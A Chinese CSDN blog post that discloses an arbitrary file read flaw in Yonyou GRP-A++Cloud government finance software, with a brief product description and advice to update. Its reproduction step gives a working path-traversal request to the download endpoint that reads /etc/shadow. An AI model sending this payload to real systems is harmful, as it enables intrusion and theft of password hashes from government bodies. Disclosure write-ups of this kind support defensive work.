用友GRPA++Cloud任意文件读取

于 2024-05-11 11:30:32 发布
阅读量361 收藏 5
点赞数 7
文章标签: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/138707894
版权

文章目录

免责声明

文章只供交流与学习,切莫做违法犯罪的事情

漏洞描述

用友 GRP-A++Cloud 政府财务云产品是以政府会计准则和预算管理一体化规范为基准,服务于政府行政事业单位,落实国家信创和行政事业单位内部控制规范要求,支持省级集中部署以及内部、外部业务协同,通过构建云原生服务,支撑业务的持续演化和变革,为政府业财一体化、财务规范化、自动化、智能化服务,打造安全、可靠、可控的信息化运行环境,提升各单位数字化治理能力。

漏洞原理

在download页面参数为fileName处存在任意文件的读取漏洞

影响版本

不详

漏洞复现

在这里插入图片描述
访问/ma/emp/maEmp/download?fileName=…/…/…/etc/shadow
在这里插入图片描述

修复建议

更新到最新版本

抠脚大汉在网络
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友GRP A++Cloud 政府财务云 任意文件读取漏洞复现(XVE-2024-10490)
0xSec
05-07 621
用友GRP A++Cloud 政府财务云 /ma/emp/maEmp/download接口存在任意文件读取漏洞,未经身份攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
ubuntu 修改文件所在的用户和组
weixin_43379058的博客
03-17 1147
来源链接 chown 修改 文件/目录 所属用户: chown userA filename/dir # 将 filename/dir 的所属用户改为 userA 用户 chgrp修改 文件/目录 所属组: chgrp grpA filename/dir # 将 filename/dir 的所属组改为 grpA 组 ...
linux 修改 文件/目录 所属用户和所属组
热门推荐
Vernon Blog
09-28 1万+
chown 修改 文件/目录 所属用户: $ chown userA filename/dir # 将 filename/dir 的所属用户改为 userA 用户 chgrp修改 文件/目录 所属组: $ chgrp grpA filename/dir # 将 filename/dir 的所属组改为 grpA 组  ...
气象部门“GRPA++财务处理系统”功能实现与应用 (2011年)
05-29
2010年气象部门开始使用“GRPA++财务处理系统”。系统主要包括财务人员在线建立账套、账务日常业务处理和填报电子报表及上报,主管单位在线远程查询其下级单位某个会计期间或某几个连续会计期间各会计科目本期借/贷...
Assistant RGAA-crx插件
04-02
对于每个GRPA测试,扩展名:*关于符合符合状态的指令列表或不测试*通过向导的测试功能应用于页面的修改列表。扩展名有一个帮助页面,以更详细地解释其构造和操作。扩展可以位于浏览器的不同部分(右侧,左侧,向下)...
非常好用的anfis程序-C代码类资源_it_ANFIS_anfiscode
04-23
3. **参数训练**:ANFIS通过学习算法来优化模糊规则的参数,最常用的是Jang的网格划分下推算法(GRPA)。这个过程可能涉及到梯度下降法或最小二乘法等优化策略。 4. **输入输出处理**:程序需要能够处理各种类型的...
jiaoyanguizeduibi
07-10
jiaoyanguizeduibi
戴师兄数据分析启蒙课_Tableau练习.twbx
07-10
戴师兄数据分析启蒙课_Tableau练习.twbx
2024年欧洲酒精测试仪和药物测试设备市场主要企业市场占有率及排名.docx
07-09
2024年欧洲酒精测试仪和药物测试设备市场主要企业市场占有率及排名.docx
理工科考研自动控制知识点大全
07-10
理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全理工科考研自动控制知识点大全
福州市建筑物矢量数据(Shp格式+带高度).txt
07-09
文件较多,数据存放网盘,txt文件内包含下载链接及提取码,永久有效。失效会第一时间进行补充。
linux常用命令大全.txt
07-10
linux
【mysql整理pdf】
07-10
mysql整理
utf8汉字字符和拼音的映射结构
07-10
utf8汉字字符和拼音的映射结构
自己总结的啊啊啊啊啊啊啊啊啊啊啊
最新发布
07-10
自己总结的啊啊啊啊啊啊啊啊啊啊啊
计算机二级资源.docx
07-10
推荐了计算机二级相关资源,涉及学习视频、电子书籍、练习网站、项目
MongoDB的Linux安装、基本操作、可视化、实验源码与报告文档.docx
07-10
以下是 MongoDB 在 Linux 上的安装、基本操作、可视化工具以及实验源码与报告文档的基本步骤: MongoDB 在 Linux 上的安装: 1. 使用包管理工具或手动下载安装 MongoDB。在大多数 Linux 发行版上,您可以使用包管理工具如apt、yum或者zypper进行安装。 2. 使用包管理工具安装 MongoDB: # 对于 Ubuntu 和 Debian sudo apt-get update sudo apt-get install mongodb # 对于 CentOS sudo yum install mongodb-org 安装完成后,启动 MongoDB 服务: sudo systemctl start mongod MongoDB 的基本操作: 1. 连接到 MongoDB 数据库: mongo 创建新的数据库: use mydatabase 在数据库中创建集合: db.createCollection("mycollection") 插入文档到集合中: db.mycollection.insertOne( { name
2024年欧洲聚氯化铝市场主要企业市场占有率及排名.docx
07-09
2024年欧洲聚氯化铝市场主要企业市场占有率及排名.docx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值